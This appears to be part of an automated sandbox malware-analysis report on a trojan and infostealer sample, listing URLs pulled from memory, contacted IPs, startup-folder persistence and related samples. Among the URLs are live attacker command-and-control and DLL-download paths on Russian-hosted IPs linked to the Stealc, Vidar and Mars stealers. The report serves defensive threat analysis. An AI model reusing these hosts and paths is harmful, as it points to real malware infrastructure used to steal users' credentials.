                                                                                                      https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alertsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.46u48o.1.exe, 0000000E.00000003.1718956588.0000000002544000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            https://indiantypefoundry.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKu48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://download.avira.com/download/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModelSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                    http://dejavu.sourceforge.netSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                      http://www.mozilla.com/en-US/blocklist/u48o.0.exe, u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                        http://185.172.128.76/15f649199f40275b/freebl3.dllUu48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://www.iolo.com/company/legal/privacy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            http://185.172.128.76/15f649199f40275b/mozglue.dllcu48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://rt.services.visualstudio.com/lSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                    http://185.172.128.76/15f649199f40275b/freebl3.dllGu48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionQg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                        https://dc.services.visualstudio.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://www.ecosia.org/newtab/u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://ocsp.sectigo.com0&zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://www.symauth.com/cps0(Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                    https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666BSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://dc.services.visualstudio.com/fSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                        https://profiler.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          http://185.172.128.76/3cd2b41cbde8fc9c.php#u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://185.172.128.76/3cd2b41cbde8fc9c.php$u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://www.symauth.com/rpa00Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://www.newtonsoft.com/jsonschemaSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                  http://www.info-zip.org/Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.0000000004348000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.000000000525D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://westus2-2.in.applicationinsights.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.iolo.com/company/legal/eula/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                        http://185.172.128.76u48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                          https://scripts.sil.org/OFLVSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2649497806.00000256725E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://dejavu.sourceforge.net/wiki/index.php/LicenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                              https://scripts.sil.org/OFLThisSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                https://github.com/itfoundry/Poppins)&&&&zSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                  https://github.com/itfoundry/Poppins)SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phpBu48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://snapshot.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://github.com/itfoundry/Poppins)&&&&vSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                          http://ocsp.sectigo.com0zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeeeCu48o.1.exe, 0000000E.00000003.1723626996.00000000009D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://www.iolo.com/company/legal/eula/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://185.172.128.76/3cd2b41cbde8fc9c.php/u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://www.newtonsoft.com/jsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                    https://westus2-2.in.applicationinsights.azure.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://185.172.128.76Hu48o.0.exe, 0000000A.00000002.1687631765.000000000405E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://google.comzLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                                                              http://185.172.128.76/3cd2b41cbde8fc9c.php7u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://dc.services.visualstudio.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://www.codeplex.com/prismSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                                    https://taskscheduler.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                                      http://185.172.128.76/3cd2b41cbde8fc9c.phpau48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.monSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://185.172.128.76/3cd2b41cbde8fc9c.phpfu48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://compositewpf.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchu48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://185.172.128.76/3cd2b41cbde8fc9c.phpku48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phpMMu48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://sectigo.com/CPS0DzLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitorSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                                                          http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/LicSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            185.172.128.90
                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                            50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                                            185.172.128.228
                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                            50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                            20.157.87.45
                                                                                                                                                                                                                                            svc.iolo.comUnited States
                                                                                                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            91.215.85.66
                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                            34665PINDC-ASRUtrue
                                                                                                                                                                                                                                            185.172.128.76
                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                            50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                                            176.97.76.106
                                                                                                                                                                                                                                            note.padd.cn.comUnited Kingdom
                                                                                                                                                                                                                                            43658INTRAFFIC-ASUAfalse
                                                                                                                                                                                                                                            185.172.128.59
                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                            50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                            Analysis ID:1430197
                                                                                                                                                                                                                                            Start date and time:2024-04-23 09:42:11 +02:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 13m 37s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Sample name:zLwT7vCojz.exe
                                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                                            Original Sample Name:577592f54bb4b19d416913b1816f7971.exe
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@26/89@5/7
                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 86%
                                                                                                                                                                                                                                            • Number of executed functions: 108
                                                                                                                                                                                                                                            • Number of non-executed functions: 258
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 40.119.6.228, 40.126.28.11, 40.126.28.21, 40.126.28.23, 40.126.28.14, 40.126.28.19, 40.126.28.18, 40.126.7.32, 40.126.28.20, 199.232.214.172, 20.114.59.183, 20.3.187.198, 192.229.211.108, 199.232.210.172, 52.168.117.172, 52.165.164.15, 13.89.179.12, 23.62.24.116, 20.9.155.150
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, onedsblobprdeus07.eastus.cloudapp.azure.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                            11:34:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT85A2.tmp
                                                                                                                                                                                                                                            11:34:46API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                            11:34:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tzgsecure.lnk
                                                                                                                                                                                                                                            11:35:03API Interceptor321038x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                                                                                            11:35:06API Interceptor298547x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            185.172.128.90H6ohQMZygb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                                            4BfhCycV4B.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
                                                                                                                                                                                                                                            5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                                                                                                                                                            XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                                            f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                                                                            wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                                            8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                                                                            f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                                                                                                                                                            V9TdcUeNlV.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
                                                                                                                                                                                                                                            JARlqZLmeA.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            iolo0.b-cdn.net4BfhCycV4B.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.93.1.244
                                                                                                                                                                                                                                            wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 169.150.236.97
                                                                                                                                                                                                                                            8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.93.1.243
                                                                                                                                                                                                                                            40jnt39QJ2.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.93.1.251
                                                                                                                                                                                                                                            Fvp0GQnESU.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.93.1.246
                                                                                                                                                                                                                                            hSWW0sdgfj.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 169.150.236.99
                                                                                                                                                                                                                                            xPudQBV1wJ.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 169.150.236.98
                                                                                                                                                                                                                                            011876zHjm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 169.150.236.98
                                                                                                                                                                                                                                            6EKLugdUZ8.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.93.1.247
                                                                                                                                                                                                                                            bRa3UYfQxA.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 185.93.1.243
